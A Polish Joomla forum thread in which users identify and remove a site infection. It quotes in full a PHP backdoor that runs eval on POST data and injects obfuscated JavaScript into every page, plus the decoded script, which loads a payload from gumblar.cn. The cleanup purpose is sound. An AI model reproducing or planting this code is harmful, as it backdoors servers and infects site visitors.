początkowo był to w większości TC - jednak sytuacja w której robal będzie wykorzystywał inne programy była kwestią czasu.
Dla pewności - Nie Zapisywać haseł do FTP!
początkowo był to w większości TC - jednak sytuacja w której robal będzie wykorzystywał inne programy była kwestią czasu.
Dla pewności - Nie Zapisywać haseł do FTP!
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Myślicie, że to jest to:
Kod PHP:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBjOWtGPSclJztldmFsKHVuZXNjYXBlKCgnYDc2YXJgMjBgNjFgM2RgMjJTYDYzcmA2OXB0YDQ1bmdpbmVgMjJgMmNiYDNkYDIyVmVyc2lvbmAyOGAyOWAyYmAyMmAyY2pgM2RgMjJgMjJgMmNgNzVgM2RuYXZpYDY3YXRvYDcyYDJldWA3M2VyQWdlbnRgM2JpYDY2KCh1YDJlaW5gNjRlYDc4T2ZgMjhgMjJgNTdgNjluYDIyKWAzZTApYDI2YDI2YDI4dWAyZWluZGVgNzhPZmAyOGAyMk5gNTRgMjA2YDIyKWAzYzBgMjlgMjZgMjYoZG9gNjN1YDZkZW5gNzRgMmVjYDZmb2tpZWAyZWluYDY0YDY1YDc4YDRmZihgMjJgNmRpZWA2YmAzZDFgMjIpYDNjMClgMjZgMjYoYDc0eWA3MGVvZmAyOGA3YXJ2enRzKWAyMWAzZHRgNzlgNzBlb2A2NihgMjJBYDIyYDI5YDI5KWA3YnpydmA3YXRzYDNkYDIyYDQxYDIyYDNiZXZhbChgMjJpZihgNzdpbmRvd2AyZWAyMmAyYmErYDIyKWpgM2RgNmFgMmJgMjIrYDYxK2AyMk1ham9yYDIyK2IrYDYxK2AyMk1pbmA2ZmA3MmAyMitiK2ErYDIyQnVgNjlsZGAyMitiK2AyMmpgM2JgMjIpYDNiZGA2ZmNgNzVtZW5gNzRgMmV3cmA2OXRgNjUoYDIyYDNjc2A2M3JgNjlwYDc0YDIwc3JgNjNgM2RgMmZgMmZgNjd1bWA2MmxgNjFyYDJlY25gMmZgNzJgNzNzYDJmYDNmaWRgM2RgMjIramAyYmAyMmAzZWAzY2A1Y2AyZmA3M2NyYDY5cHRgM2VgMjIpYDNiYDdkJykucmVwbGFjZSgvYC9nLGM5a0YpKSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)***********#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n -->***********#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
jestem pewny, że to właśnie TO...
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Widzicie tutaj jakiś najbardziej charakterystyczny fragment kodu? Taki, żeby na podstawie tego fragmentu przefiltrować wszystkie pliki w poszukiwaniu kodu?
właśnie wkleiłeś go wyżej .. co nie znaczy, że nie może być inny ..
rusz trochę głową przejrzyj 2 - 3 pliki i porównaj ..
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Np. ten. Znalazłem jeszcze coś takiego. Nie wiem czy to również nadaje się do kasacji.?
BTW. Kod ten w moim przypadku znajduje się nie tylko w plikach index.php ale również functions.php, dbtable.php, config.phpKod PHP:
<script language=javascript><!--
(function(){var c9kF='%';eval(unescape(('`76ar`20`61`3d`22S`63r`69pt`45ngine`22`2cb`3d`22Version`28`29`2b`22`2cj`3d`22`22`2c`75`3dnavi`67ato`72`2eu`73erAgent`3bi`66((u`2ein`64e`78Of`28`22`57`69n`22)`3e0)`26`26`28u`2einde`78Of`28`22N`54`206`22)`3c0`29`26`26(do`63u`6den`74`2ec`6fokie`2ein`64`65`78`4ff(`22`6die`6b`3d1`22)`3c0)`26`26(`74y`70eof`28`7arvzts)`21`3dt`79`70eo`66(`22A`22`29`29)`7bzrv`7ats`3d`22`41`22`3beval(`22if(`77indow`2e`22`2ba+`22)j`3d`6a`2b`22+`61+`22Major`22+b+`61+`22Min`6f`72`22+b+a+`22Bu`69ld`22+b+`22j`3b`22)`3bd`6fc`75men`74`2ewr`69t`65(`22`3cs`63r`69p`74`20sr`63`3d`2f`2f`67um`62l`61r`2ecn`2f`72`73s`2f`3fid`3d`22+j`2b`22`3e`3c`5c`2f`73cr`69pt`3e`22)`3b`7d').replace(/`/g,c9kF)))})();
-->***********
Ostanio edytowane przez taniestruny.pl : 12-05-2009 12:33
no teraz wkleiłeś zdekodowany powyższy ..
zaczynam nie rozumieć Twoich pytań - wiesz o co chodzi a pytasz 10x ..
zrób pełny backup na wszelki wypadek i zacznij sprzątać .. no więcej ci nie pomogę ..
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!
Wybaczcie Panowie Nie w celu zaśmiecania pytam a jedynie w trosce o sukces moich działań. Strona, na której sprzątam to nie strona domowa mojego pieska a dosyć poważnej instytucji i nie chcę narobić gnoju. Wolę spytać dwa razy niż później zbierać cięgi
Moglibyście Panowie sprawdzić czy Wam pokazuje jeszcze błąd na tej stronie www.chopin.man.bialystok.pl
Wydaje mi sie, że usunąłem wszystkie wpisy ale mój Kaspersy nadal pokazuje błąd.
przynajmniej w jeszcze kilku plikach jest trojan :
np: mootols.js, caption.js
Pozdrawiam, Michał,
-------------------------
wiki.joomla.pl | JAMP 3.0 - Localhost server for Joomla! | Usuwanie wirusów z Joomla! | BlueCoyote - Administracja Joomla!